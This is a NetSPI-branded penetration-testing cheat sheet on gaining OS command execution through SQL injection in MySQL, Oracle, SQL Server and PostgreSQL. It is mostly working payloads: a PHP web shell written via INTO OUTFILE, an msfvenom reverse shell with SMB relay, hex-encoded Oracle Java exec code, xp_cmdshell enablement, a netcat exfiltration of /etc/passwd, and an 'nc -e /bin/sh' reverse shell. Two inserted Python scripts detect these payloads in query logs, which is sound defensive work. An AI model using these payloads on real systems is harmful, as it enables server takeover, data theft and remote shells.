Executing OS Commands Through MySQL

Running OS commands is one of the primary objectives of SQL injection, since it leads to full control of the host OS. This may be achieved by executing commands directly, modifying existing data to place a shell on a web page, or exploiting hidden functionality in the database.

Description: Command Execution (PHP)
Query:
SELECT "<? echo passthru($_GET['cmd']); ?>" INTO OUTFILE '/var/www/shell.php'

Description: Command Execution with MySQL CLI Access
Reference: https://infamoussyn.wordpress.com/2014/07/11/gaining-a-root-shell-using-mysql-user-defined-functions-and-setuid-binaries/

Description: Reading files from disk (Linux)
Query:
SELECT load_file("/etc/passwd");

SMB Relay Shell

Requires
* Metasploit
* smbrelayx

Generate the reverse shell payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR.IP.GOES.HERE LPORT=443 -f exe > reverse_shell.exe

Generate a listener to deliver the reverse shell

smbrelayx.py -h VICTIM.IP.GOES.HERE -e ./reverse_shell.exe

Execute any one of the MySQL queries below to make the database server connect to the listener

select load_file('\\\\YOUR.IP.GOES.HERE\\aa');
select load_file(0x5c5c5c5c3139322e3136382e302e3130315c5c6161);
select 'netspi' into dumpfile '\\\\YOUR.IP.GOES.HERE\\aa';
select 'netspi' into outfile '\\\\YOUR.IP.GOES.HERE\\aa';
load data infile '\\\\YOUR.IP.GOES.HERE\\aa' into table database.table_name;

For more information see here

Executing OS Commands Through Oracle

Java can be used to execute commands if it's installed.

Description: Creating Java Classes
Query:
/* create Java class */
BEGIN
EXECUTE IMMEDIATE 'create or replace and compile java source named "PwnUtil" as import java.io.*; public class PwnUtil{ public static String runCmd(String args){ try{ BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));String stemp, str = "";while ((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}} public static String readFile(String filename){ try{ BufferedReader myReader = new BufferedReader(new FileReader(filename));String stemp, str = "";while((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}}};';
END;
/

BEGIN
EXECUTE IMMEDIATE 'create or replace function PwnUtilFunc(p_cmd in varchar2) return varchar2 as language java name ''PwnUtil.runCmd(java.lang.String) return String'';';
END;
/

/* run OS command */
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;

Description: Creating Java Classes (Hex encoded)
Query:
/* create Java class */
SELECT TO_CHAR(dbms_xmlquery.getxml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c61636520616e6420636f6d70696c65206a61766120736f75726365206e616d6564202270776e7574696c2220617320696d706f7274206a6176612e696f2e2a3b7075626c696320636c6173732070776e7574696c7b7075626c69632073746174696320537472696e672072756e28537472696e672061726773297b7472797b4275666665726564526561646572206d726561643d6e6577204275666665726564526561646572286e657720496e70757453747265616d5265616465722852756e74696d652e67657452756e74696d6528292e657865632861726773292e676574496e70757453747265616d282929293b20537472696e67207374656d702c207374723d22223b207768696c6528287374656d703d6d726561642e726561644c696e6528292920213d6e756c6c29207374722b3d7374656d702b225c6e223b206d726561642e636c6f736528293b2072657475726e207374723b7d636174636828457863657074696f6e2065297b72657475726e20652e746f537472696e6728293b7d7d7d''));
EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c6163652066756e6374696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b'')); end;')) results FROM dual

/* run OS command */
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
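Both the MySQL primitives (load_file, INTO OUTFILE, the SMB relay payload) and the Oracle Java-source payload appear on this page in hex-encoded form as well as in plain text (a MySQL 0x literal and an Oracle hextoraw() argument), so a keyword rule that only inspects the raw statement misses the encoded variant. The Python below is an added defensive example, not code from this page or from NetSPI's tooling: it decodes such literals in logged statements before matching the primitives from the MySQL, SMB relay and Oracle sections; the signature family names and the sample log lines are constructed.

```python
import re

# Constructed sample query-log lines (not real captures). Lines 2 and 4 are the
# hex-encoded forms shown on this page: a MySQL 0x literal carrying a UNC path,
# and an Oracle hextoraw() argument carrying the start of the Java source.
SAMPLE_QUERIES = [
    "select id, name from users where id = 42",
    "select load_file(0x5c5c5c5c3139322e3136382e302e3130315c5c6161)",
    "SELECT \"<? echo passthru($_GET['cmd']); ?>\" INTO OUTFILE '/var/www/shell.php'",
    "begin execute immediate utl_raw.cast_to_varchar2(hextoraw('"
    "637265617465206f72207265706c61636520616e6420636f6d70696c65206a61766120736f75726365"
    "')); end;",
]

# A MySQL 0x... literal or an Oracle hextoraw('...') argument (single or doubled quotes).
HEX_LITERAL = re.compile(r"\b0x([0-9a-f]{2,})\b|hextoraw\('+([0-9a-f]+)'+\)", re.I)

# Command-execution and file-access primitives covered by this page, by family.
SIGNATURES = {
    "mysql_file": [r"\bload_file\s*\(", r"\binto\s+(out|dump)file\b", r"\bload\s+data\s+infile\b"],
    "oracle_java": [r"create\s+or\s+replace\s+and\s+compile\s+java\s+source", r"\blanguage\s+java\s+name\b"],
    "smb_unc_path": [r"\\{2,}[\w.\-]+\\+\w"],  # \\host\share forces an outbound SMB connection
}

def _decode_literal(match):
    hexdigits = match.group(1) or match.group(2)
    try:
        return bytes.fromhex(hexdigits).decode("utf-8", errors="replace")
    except ValueError:  # odd digit count is not a byte string; leave the literal alone
        return match.group(0)

def normalize(query):
    """Replace hex-encoded literals with their decoded text so keyword rules see it."""
    return HEX_LITERAL.sub(_decode_literal, query)

def scan(query):
    """Return the sorted signature families that match the normalized statement."""
    text = normalize(query)
    return sorted(family for family, patterns in SIGNATURES.items()
                  if any(re.search(p, text, re.I) for p in patterns))

if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        print(scan(q) or "clean", "<-", q[:60])
```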

Executing OS Commands Through SQL Server

Name: xp_cmdshell
Query:
-- Enable show advanced options
sp_configure 'show advanced options', 1
RECONFIGURE
GO

-- Enable xp_cmdshell
sp_configure 'xp_cmdshell', 1
RECONFIGURE
GO

EXEC xp_cmdshell 'net user'

Write to registry autorun: https://blog.netspi.com/establishing-registry-persistence-via-sql-server-powerupsql/
    https://gist.github.com/nullbind/03af8d671621a6e1cef770bace19a49e
Write to file autorun: https://blog.netspi.com/how-to-hack-database-links-in-sql-server/
Agent Jobs: https://www.optiv.com/blog/mssql-agent-jobs-for-command-execution
SQL Injection in stored procedures: https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/
CLR Assembly: https://blog.netspi.com/attacking-sql-server-clr-assemblies/
Custom Extended Stored Procedure: https://github.com/NetSPI/PowerUpSQL/blob/master/templates/cmd_exec.cpp

TSQL

ActiveX Javascript Agent Job: https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_agentjob_activex_jscript.sql
ActiveX VBScript Agent Job: https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_agentjob_activex_vbscript.sql
cmdexec Agent Job: https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_agentjob_cmdexec.sql
Powershell Agent Job: https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_agentjob_powershell.sql
Custom Command Shell: https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_customxp.cpp
OLE Automation Object: https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_oleautomationobject.sql
OPENROWSET: https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_openrowset.sql
Python: https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_pythonscript.tsql
R: https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_rscript.sql
xp_cmdshell proxy: https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_xpcmdshell_proxy.sql

Executing OS Commands Through PostgreSQL

Name: FROM PROGRAM
Query:
DROP TABLE IF EXISTS myoutput;
CREATE TABLE myoutput(filename text);
COPY myoutput FROM PROGRAM 'ps aux';
SELECT * FROM myoutput ORDER BY filename ASC;

Name: Create PostgreSQL Function Mapped to Libc System Method
Query:
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
SELECT system('cat /etc/passwd | nc ');

Notes:
This method works with PostgreSQL 8.1 and below. After version 9, you will have to upload your own library compiled with PG_MODULE_MAGIC set.
The process is outlined at https://www.dionach.com/blog/postgresql-9x-remote-command-execution; a summary follows.

1. Get the PostgreSQL server version with the query below.

SELECT version();

2. To compile the library, a Linux machine with the same PostgreSQL version as the target is required. Below is an example showing how to install PostgreSQL and its server development headers.

apt install postgresql postgresql-server-dev-9.6

3. Download the pgexec source from https://github.com/Dionach/pgexec/tree/master.

4. Compile pgexec with the command below.

gcc -I$(/usr/local/pgsql/bin/pg_config --includedir-server) -shared -fPIC -o pg_exec.so pg_exec.c

5. Upload the library to the target system. First split the file into pieces.

split -b 2048 pg_exec.so

6. The file can then be written to disk through PostgreSQL using the commands below.

SELECT lo_creat(-1); -- returns the OID of the new large object (16388 below)
\set c0 `base64 -w 0 xaa`
INSERT INTO pg_largeobject (loid, pageno, data) values (16388, 0, decode(:'c0', 'base64'));

Then repeat the \set and INSERT for each remaining piece of the file (xab, xac, ...), incrementing pageno each time.

7. Create the function.

CREATE FUNCTION sys(cstring) RETURNS int AS '/tmp/pg_exec.so', 'pg_exec' LANGUAGE 'c' STRICT;

8. Send a reverse shell to your system.

SELECT sys('nc -e /bin/sh 10.0.0.1 4444');

Source: https://www.dionach.com/blog/postgresql-9x-remote-command-execution
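The xp_cmdshell procedure in the SQL Server section and the library-upload procedure above are multi-statement sequences (enable, RECONFIGURE, execute; lo_creat, INSERT INTO pg_largeobject, CREATE FUNCTION ... LANGUAGE c), so matching single statements either misses the staging or alerts on every harmless RECONFIGURE. The Python below is an added defensive example, not part of this page or of the tools it references: it correlates logged statements per session and reports a chain only once all of its stages have occurred in order; the chain names, session identifiers and log format are constructed.

```python
import re
from collections import defaultdict

# Statement chains from this page. Each chain is an ordered list of regexes; a
# session is reported for a chain once every stage has matched in that order.
CHAINS = {
    "mssql_enable_then_run_xp_cmdshell": [
        r"sp_configure\s+'xp_cmdshell'\s*,\s*1", r"\breconfigure\b", r"\bxp_cmdshell\s+'"],
    "mssql_xp_cmdshell_exec": [r"\bxp_cmdshell\s+'"],
    "postgres_upload_library_then_map": [
        r"\blo_creat\s*\(", r"insert\s+into\s+pg_largeobject\b",
        r"create\s+(or\s+replace\s+)?function\b.*\blanguage\s+'?c\b"],
    "postgres_copy_from_program": [r"\bcopy\b.*\bfrom\s+program\b"],
}

# Constructed log lines (not real captures): "<session>\t<statement>".
LOG_LINES = [
    "spid51\tsp_configure 'show advanced options', 1",
    "spid51\tsp_configure 'xp_cmdshell', 1",
    "spid51\tRECONFIGURE",
    "spid51\tEXEC xp_cmdshell 'net user'",
    "spid52\tEXEC xp_cmdshell 'whoami'",  # already enabled: only the single-stage rule fires
    "pg-7\tSELECT lo_creat(-1);",
    "pg-7\tINSERT INTO pg_largeobject (loid, pageno, data) values (16388, 0, decode('AAAA', 'base64'));",
    "pg-7\tINSERT INTO pg_largeobject (loid, pageno, data) values (16388, 1, decode('AAAA', 'base64'));",
    "pg-7\tCREATE FUNCTION sys(cstring) RETURNS int AS '/tmp/pg_exec.so', 'pg_exec' LANGUAGE 'c' STRICT;",
    "pg-8\tCOPY myoutput FROM PROGRAM 'ps aux';",
    "pg-9\tSELECT * FROM myoutput ORDER BY filename ASC;",
]

def detect_chains(lines):
    """Return the set of (session, chain) pairs whose stages all matched in order."""
    progress = defaultdict(int)  # (session, chain) -> index of the next stage to match
    alerts = set()
    for line in lines:
        session, _, statement = line.partition("\t")
        for name, stages in CHAINS.items():
            stage = progress[(session, name)]
            if stage < len(stages) and re.search(stages[stage], statement, re.I):
                progress[(session, name)] = stage + 1
                if stage + 1 == len(stages):
                    alerts.add((session, name))
    return alerts

if __name__ == "__main__":
    for session, chain in sorted(detect_chains(LOG_LINES)):
        print(f"ALERT {session}: {chain}")
```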


Metasploit postgres_payload Module
This module can be used with direct connections.
Reference: https://www.rapid7.com/db/modules/exploit/linux/postgres/postgres_payload
exploit/linux/postgres/postgres_payload

© 2023 Copyright by NetSPI. All rights reserved.